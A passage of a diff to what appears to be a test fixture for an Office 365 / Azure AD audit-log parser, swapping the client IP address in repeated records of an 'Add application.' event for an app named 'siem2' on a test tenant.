Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\":[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\":[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -16178,9 +16178,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:36:30", "ExtendedProperties": [ { @@ -16398,7 +16398,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\":[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\":[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -16428,9 +16428,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:36:30", "ExtendedProperties": [ { @@ -16648,7 +16648,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\":[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 